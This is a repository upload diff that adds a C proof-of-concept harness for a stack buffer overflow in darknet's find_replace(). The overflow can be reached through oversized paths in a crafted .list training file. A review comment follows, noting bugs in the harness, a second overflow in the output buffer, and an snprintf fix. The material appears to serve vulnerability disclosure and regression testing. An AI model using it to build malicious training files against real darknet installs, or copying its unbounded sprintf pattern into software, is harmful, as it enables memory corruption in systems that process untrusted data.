Upload poc_sprintf_overflow.c with huggingface_hub
Browse files- poc_sprintf_overflow.c +74 -0
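--- a/poc_sprintf_overflow.c
+++ b/poc_sprintf_overflow.c
@@ -0,0 +1,74 @@
+/*
+* PoC: Stack buffer overflow in find_replace() — src/utils.c:216-230
+*
+* Vulnerability: find_replace() uses a fixed char buffer[4096] with sprintf()
+* and has no bounds checking. When called with a string > 4096 chars,
+* sprintf(buffer, "%s", str) overflows the stack buffer.
+*
+* Attack vector: Training data paths from .list files are passed to
+* find_replace() via fill_truth_detection() (data.c:450) and
+* find_replace_paths() (data.c:56-64). A malicious .list file with
+* paths > 4096 chars triggers the overflow.
+*
+* Also: data.c:61 has char replaced[4096] — another stack buffer overflow
+* target via the same path.
+*
+* This harness demonstrates the overflow by calling find_replace() directly
+* with an oversized string, simulating what happens when darknet processes
+* a malicious training data file.
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+/* Exact copy of the vulnerable function from src/utils.c:216-230 */
+void find_replace(char *str, char *orig, char *rep, char *output)
+{
+char buffer[4096] = {0};
+char *p;
+
+sprintf(buffer, "%s", str); /* OVERFLOW: str > 4096 */
+if(!(p = strstr(buffer, orig))){
+sprintf(output, "%s", str);
+return;
+}
+
+*p = '\0';
+
+sprintf(output, "%s%s%s", buffer, rep, p+strlen(orig));
+}
+
+int main(int argc, char **argv)
+{
+/* Simulate a malicious image path from a .list file */
+/* In real darknet, this comes from fgetl() reading train.list */
+int path_len = 5000;
+if (argc > 1) path_len = atoi(argv[1]);
+
+char *malicious_path = malloc(path_len + 1);
+memset(malicious_path, 'A', path_len);
+
+/* Inject "images" at position 100 so find_replace has something to match */
+memcpy(malicious_path + 100, "images", 6);
+
+/* End with a valid-looking extension */
+memcpy(malicious_path + path_len - 4, ".jpg", 4);
+malicious_path[path_len] = '\0';
+
+printf("[*] PoC: find_replace() stack buffer overflow (src/utils.c:221)\n");
+printf("[*] Input string length: %d bytes\n", path_len);
+printf("[*] Fixed buffer size: 4096 bytes\n");
+printf("[*] Overflow: %d bytes past buffer\n", path_len - 4096);
+printf("[*] Calling find_replace()...\n");
+
+/* This is the exact call from data.c:220 / data.c:450 */
+char labelpath[4096];
+find_replace(malicious_path, "images", "labels", labelpath);
+
+/* Should never reach here with ASAN */
+printf("[!] If you see this, ASAN is not enabled\n");
+
+free(malicious_path);
+return 0;
+}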
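Review bot: `path_len` is taken from `atoi(argv[1])` (file line 47) without validation, so a value below 106 — or a negative or non-numeric argument, which `atoi` silently maps to 0 — makes the `memcpy` calls at lines 53 and 56 write outside (or before) the allocation, and the `malloc(path_len + 1)` result at line 49 is never checked for NULL, so the harness itself can fault for reasons unrelated to the bug it demonstrates. Two guard lines after the argument parse fix both: `if (path_len < 106) { fprintf(stderr, "path_len must be >= 106\n"); return 1; }` and, after the allocation, `if (!malicious_path) { perror("malloc"); return 1; }` (a `strtol` with an end-pointer check would be stricter than `atoi`, but the range check is the essential part). The header comment blames only `buffer`, but with the default length the `sprintf(output, ...)` at line 39 also writes about 5000 bytes into the caller's `labelpath[4096]` (line 66), so the output buffer is a second overflow on the same call and a fix that only bounds `buffer` would be incomplete. The header would be more useful to the maintainer fixing this if it also stated the remediation — `snprintf(buffer, sizeof buffer, "%s", str)` plus a bounded write to `output` (an output-size parameter or a caller-side length check) — so the harness can double as a regression test once the fix lands.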